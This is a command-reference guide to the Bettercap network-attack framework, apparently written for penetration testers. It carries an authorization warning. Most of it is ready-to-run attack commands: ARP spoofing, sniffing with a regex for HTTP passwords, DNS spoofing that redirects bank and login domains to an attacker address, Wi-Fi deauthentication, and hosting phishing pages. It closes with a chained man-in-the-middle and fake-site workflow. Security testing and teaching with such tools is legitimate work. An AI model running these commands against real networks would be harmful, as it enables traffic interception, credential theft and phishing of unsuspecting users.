A comprehensive guide to Bettercap modules, their syntax, and practical examples for ethical hacking
Introduction to Bettercap
Bettercap is a powerful and flexible framework for network reconnaissance and MITM (Man-In-The-Middle)
attacks. It is developed as a completely modular tool that allows security professionals to discover, sniff,
and manipulate network traffic in various ways.
Ethical Warning: The tools and techniques described in this guide should only be used for
legitimate security testing with proper authorization. Unauthorized use of these tools may violate laws and
regulations.
Core Concepts
Bettercap operates through a series of modules, each designed for specific network operations. These modules
can be started, stopped, and configured using a simple command interface. Understanding these modules is
essential for effective security testing.
Network Reconnaissance Modules
These modules help in discovering and mapping the network.
net.probe
not running
Sends probe packets to discover active hosts on the network.
Usage
# Start the module
> net.probe on
# Configure probe timing
> set net.probe.throttle 10
# Stop the module
> net.probe off
Example: Discover all hosts on a local network
> net.probe on
> net.show
net.recon
not running
Passively collects network data and identifies hosts.
Usage
# Start the module
> net.recon on
# Show discovered hosts
> net.show
# Stop the module
> net.recon off
syn.scan
not running
Performs SYN port scanning on target hosts.
Usage
# Scan a specific host for common ports
> syn.scan 192.168.1.10
# Scan specific ports
> set syn.scan.ports 22,80,443
> syn.scan 192.168.1.10
Example: Port scan multiple hosts
> set syn.scan.ports 1-1000
> syn.scan 192.168.1.0/24
Traffic Interception & MITM Modules
These modules facilitate the interception and manipulation of network traffic.
arp.spoof
not running
Performs ARP spoofing to intercept network traffic.
Usage
# Target a specific host
> set arp.spoof.targets 192.168.1.10
# Enable the module
> arp.spoof on
# Disable the module
> arp.spoof off
For ARP spoofing to effectively intercept traffic, you'll typically need to enable IP forwarding:
set arp.spoof.fullduplex true
net.sniff
not running
Captures and analyzes network packets.
Usage
# Start sniffing
> net.sniff on
# Filter specific traffic
> set net.sniff.filter tcp port 80
> net.sniff on
# Stop sniffing
> net.sniff off
Example: Capture HTTP credentials
> set net.sniff.regexp '.*password=.+'
> net.sniff on
dns.spoof
not running
Performs DNS spoofing attacks.
Usage
# Set DNS redirection rules
> set dns.spoof.domains example.com,*.example.org
> set dns.spoof.address 192.168.1.100
# Start DNS spoofing
> dns.spoof on
Example: Redirect specific websites
> set dns.spoof.domains *.bank.com,secure-login.com
> set dns.spoof.address 192.168.1.100
> dns.spoof on
Web & Proxy Modules
These modules help in intercepting and manipulating HTTP/HTTPS traffic.
http.proxy
not running
HTTP proxy module for intercepting and modifying HTTP traffic.
Usage
# Start the HTTP proxy
> http.proxy on
# Configure proxy port
> set http.proxy.port 8080
# Stop the proxy
> http.proxy off
https.proxy
not running
HTTPS proxy module for intercepting encrypted traffic.
Usage
# Generate SSL certificate
> https.proxy on
# Customize certificate details
> set https.proxy.certificate.commonname "My CA"
> set https.proxy.certificate.country "US"
> https.proxy on
The HTTPS proxy requires a valid certificate or for targets to accept your self-signed certificate.
http.server
not running
Simple HTTP server for hosting files or phishing pages.
Usage
# Start HTTP server
> set http.server.path /path/to/webroot
> http.server on
# Configure server port
> set http.server.port 80
> http.server on
Wireless & Bluetooth Modules
Modules for intercepting and analyzing wireless communications.
wifi
not running
Wireless network scanning and attacks.
Usage
# Set wireless interface to monitor mode
> wifi.recon on
# Show discovered access points
> wifi.show
# Deauthenticate clients
> wifi.deauth AP:MA:C:AD:DR:ES
ble.recon
not running
Bluetooth Low Energy device discovery and enumeration.
Usage
# Start BLE scanning
> ble.recon on
# Show discovered BLE devices
> ble.show
# Enumerate a specific device
> ble.enum DE:VI:CE:AD:DR:ES
API & UI Modules
Modules for interacting with Bettercap through different interfaces.
api.rest
not running
RESTful API for remote control of Bettercap.
Usage
# Start the API server
> set api.rest.username admin
> set api.rest.password securepassword
> api.rest on
# Configure API port
> set api.rest.port 8083
> api.rest on
ui
not running
Web user interface for Bettercap.
Usage
# Start the web UI
> ui on
# Configure UI port and address
> set ui.port 8080
> set ui.address 0.0.0.0
> ui on
The UI module requires the api.rest module to be running.
events.stream
running
Streams events and logs from Bettercap.
Usage
# Stream events to a file
> set events.stream.output /path/to/logfile.log
> events.stream on
# Filter specific events
> set events.stream.filter net.sniff
> events.stream on
Miscellaneous Modules
Various utility modules for different purposes.
mac.changer
not running
Changes the MAC address of network interfaces.
Usage
# Change to a random MAC
> set mac.changer.address random
> mac.changer on
# Set a specific MAC
> set mac.changer.address 00:11:22:33:44:55
> mac.changer on
ticker
not running
Shows periodic statistics about network activity.
Usage
# Start the ticker
> ticker on
# Configure ticker period
> set ticker.period 5
> ticker on
# Discover hosts
> net.probe on
# Wait a few seconds
> net.probe off
# Select target
> set arp.spoof.targets 192.168.1.10
# Start ARP spoofing
> arp.spoof on
# Start packet capture
> net.sniff on
DNS Spoofing Attack
# Set up ARP spoofing
> set arp.spoof.targets 192.168.1.10
> arp.spoof on
# Configure DNS spoofing
> set dns.spoof.domains *.example.com
> set dns.spoof.address 192.168.1.100
# Start DNS spoofing
> dns.spoof on
# Start HTTP server with fake site
> set http.server.path /path/to/fake/site
> http.server on